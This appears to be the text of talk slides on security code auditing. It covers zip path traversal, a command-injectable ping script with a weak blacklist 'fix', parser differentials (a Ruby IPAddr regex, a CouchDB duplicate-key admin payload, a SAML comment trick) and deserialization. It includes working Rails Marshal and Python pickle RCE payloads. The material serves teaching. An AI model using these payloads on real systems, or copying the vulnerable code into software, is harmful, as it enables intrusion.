Can’t say it often enough

• RTFM
• Context matters a lot
• When you make assumptions about how something works, you either miss bugs or assume something is a bug when it is not

This unzipping thing

// Store filename/path for returning and using later on
fpath := filepath.Join(dest, f.Name)
filenames = append(filenames, fpath)

Fixed!

// Store filename/path for returning and using later on
outName := filepath.Clean(f.name)
fpath := filepath.Join(dest, outName)
filenames = append(filenames, fpath)

filepath.Clean

What’s this?

import re
import os
import fileinput
# this thing does ping
print("Gimme a host: " , end='',flush = True)
for line in fileinput.input():
    print("[*] pinging in progress")
    os.system("ping -c 2 %s" % line )
    print("[*] pinging done")
    print("Gimme a host: " , end='',flush = True)

Fixed!

import re
import os
import fileinput
# this thing does securely ping
print("Gimme a host: " , end='',flush = True)
for line in fileinput.input():
    # reject invalid (hacker!!) input
    if re.search('[;\'&{}<>|]', line):
        print("no thanks!")
        exit()
    print("[*] pinging in progress")
    os.system("ping -c 2 %s" % line )
    print("[*] pinging done")
    print("Gimme a host: " , end='',flush = True)

Large Code Bases

Large Code Bases

Large Code Bases

• Even some simple projects have an overwhelming amount of underlying code.
• Just think of the dependencies and the dependencies of the dependencies …
  • Prime example
• A simple “Hello World” Web app can already introduce a ton of dependet code.
  • Depending on the choice of Framework

Large Code Bases

What helps tackling such monster?

• Prioritize & Scope
• A Threat Model
• Knowing the data flows
• Having meaningful documentation

Prioritization / Scoping

1. Limit the audit to the actual code
2. Use existing Threat Models
3. Prioritize by features/vuln classes
   • Critical stuff first
   • File upload, login, password reset, access controls…
4. Where needed: dig deeper into dependencies
   • There might be a lot of gut feeling involved ;)

“Speed Reading”

git clone https://tinyurl.com/buzzfizz

;)

Parser Differentials

When two parsers yield different results for the same input things might go wrong™️

Example: Ruby RegEx vs. IPAddr()

CVE-2015-3224

    TRUSTED_PROXIES = %r{
      ^127\.0\.0\.1$                | # localhost IPv4
      ^::1$                         | # localhost IPv6
      ^fc00:                        | # private IPv6 range fc00
      ^10\.                         | # private IPv4 range 10.x.x.x
      ^172\.(1[6-9]|2[0-9]|3[0-1])\.| # private IPv4 range 172.16.0.0 .. 172.31.255.255
      ^192\.168\.                     # private IPv4 range 192.168.x.x
    }x

Example: Ruby RegEx vs. IPAddr()

irb(main):003:0> IPAddr.new('::1')
=> #<IPAddr: IPv6:0000:0000:0000:0000:0000:0000:0000:0001/ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff>

Example: Ruby RegEx vs. IPAddr()

irb(main):006:0> IPAddr.new('::1') == IPAddr.new('127.0.0.1')
=> false
irb(main):007:0> IPAddr.new('::1') == IPAddr.new('0::23')
=> false
irb(main):008:0> IPAddr.new('::1') == IPAddr.new('0000::1')
=> true

^::1$ 

Example: JS vs. Erlang

Vulnerability found by Max Justicz

Example: JS vs. Erlang

CouchDB implements authorization checks in JavaScript. Storage within the DB is implemented in Erlang.

Example: JS vs. Erlang

JavaScript’s JSON.parse() will return the last value on duplicate keys:

JSON.parse("{\"foo\":\"bar\", \"foo\": \"baz\"}")
{foo: "baz"}

Example: JS vs. Erlang

CouchDB uses the Jiffy within the Erlang part to parse JSON input:

jiffy:decode("{\"foo\":\"bar\", \"foo\":\"baz\"}").
{[{<<"foo">>,<<"bar">>},{<<"foo">>,<<"baz">>}]}

Example: JS vs. Erlang

Exploit Payload:

    { 
      "type": "user",
      "name": "richter",
      "roles": ["_admin"],
      "roles": [],
      "password": "password"
    }

Example: various (SAML)

XML Canonicalization:

<A X="1" Y="2">some text<!-- and a comment --></A>

<A Y="2" X="1" >some text</A >

Example: various (SAML)

Issue found by Duo Labs

Python defusedxml:

from defusedxml.lxml import fromstring
payload = "<NameID>kludwig</NameID>"
data = fromstring(payload)
return data.text # should return 'kludwig'

Example: various (SAML)

from defusedxml.lxml import fromstring
doc = "<NameID>klud<!-- a comment? -->wig</NameID>"
data = fromstring(payload)
return data.text # should return ‘kludwig’?

Example: various (SAML)

<NameID>klud<!-- a comment? -->wig</NameID>

element: NameID
|_ text: klud
|_ comment: a comment?
|_ text: wig

Example: various (SAML)

<NameID>user@user.com<!---->.evil.com</NameID>

(De)Serialization

• In general
  • Some string represents a serialized object
  • The object gets instantiated while bypassing the constructor
  • Object properties get assigned directly from the serialized content
  • Methods like __wakeup (PHP) or marshal_load get invoked to perform custom deserialization tasks
  • The newly deserialized object lives happily until the garbage collector kills it

PHP

unserialize($user_input)

php > echo serialize(["hello","world",true,[1,2,"1337"]]);
a:4:{i:0;s:5:"hello";i:1;s:5:"world";i:2;b:1;i:3;a:3:{i:0;i:1;i:1;i:2;i:2;s:4:"1337";}}

PHP

“Magic” methods can be used to get to RCE.

• Tool for RCE gadget chains

Java

Keep an eye on:

• java.io.Serializable

• java.io.ObjectInputStream

• ObjectInputStream does not check which class gets deserialized
• There is no whitelist/blacklist which classes are allowed to get deserialized

• All serializable classes that the current classloader can locate and load might get deserialized

Java

Further reading:

• “Exploiting Deserialization Vulnerabilities in Java” by Matthias Kaiser
• Tool: ysoserial

Ruby

In Ruby Marshal is used to

• serialize (str = Marshal.dump(obj))

and

• unserialize (obj = Marshal.load(str)) Objects.

Ruby

irb(main):001:0> foo = ["Some funky string",{"a hash"=>1337}]
=> ["Some funky string", {"a hash"=>1337}]
irb(main):002:0> Marshal.dump foo
=> "\x04\b[\aI\"\x16Some funky string\x06:\x06ET{\x06I\"\va
hash\x06;\x00Ti\x029\x05"

Ruby (on Rails) RCE payload

marshal_payload = Rex::Text.encode_base64(
  "\x04\x08" +
  "o" +
  ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
  "\x07" +
      ":\x0E@instance" +
         "o" + ":\x08ERB" + "\x06" +
            ":\x09@src" +
              Marshal.dump(attackercode)[2..-1] +
      ":\x0C@method" + ":\x0Bresult"
).chomp
end

Ruby (on Rails) RCE flow

class DeprecatedInstanceVariableProxy < DeprecationProxy
   def initialize(instance, method, var = "@#{method}",
       deprecator = ActiveSupport::Deprecation.instance)
     @instance = instance
     @method = method
     @var = var
     @deprecator = deprecator
   end
   private
     def target
       @instance.__send__(@method)
     end

     def warn(callstack, called, args)
  [...]
     end
 end

Ruby (on Rails) RCE flow

Parent class DeprecationProxy

def method_missing(called, *args, &block)
  warn caller, called, args
  target.__send__(called, *args, &block)
end

instance_methods.each { |m| undef_method m
  unless m =~ /^__|^object_id$/ }

Credits: charliesome

Ruby (on Rails) RCE payload

marshal_payload = Rex::Text.encode_base64(
  "\x04\x08" +
  "o" +
  ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
  "\x07" +
      ":\x0E@instance" +
         "o" + ":\x08ERB" + "\x06" +
            ":\x09@src" +
              Marshal.dump(attackercode)[2..-1] +
      ":\x0C@method" + ":\x0Bresult"
).chomp
end

Python

Python pickle

Warning

The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Python

Use __reduce__ for generating payloads.

import pickle
import os

class Payload(object):
  def __reduce__(self):
    return(os.system,(("id"),))

Python

In [4]: pickle.dumps(Payload())
Out[4]: b'\x80\x03cposix\nsystem\nq\x00X\x02\x00\x00\x00idq\x01\x85q\x02Rq\x03.'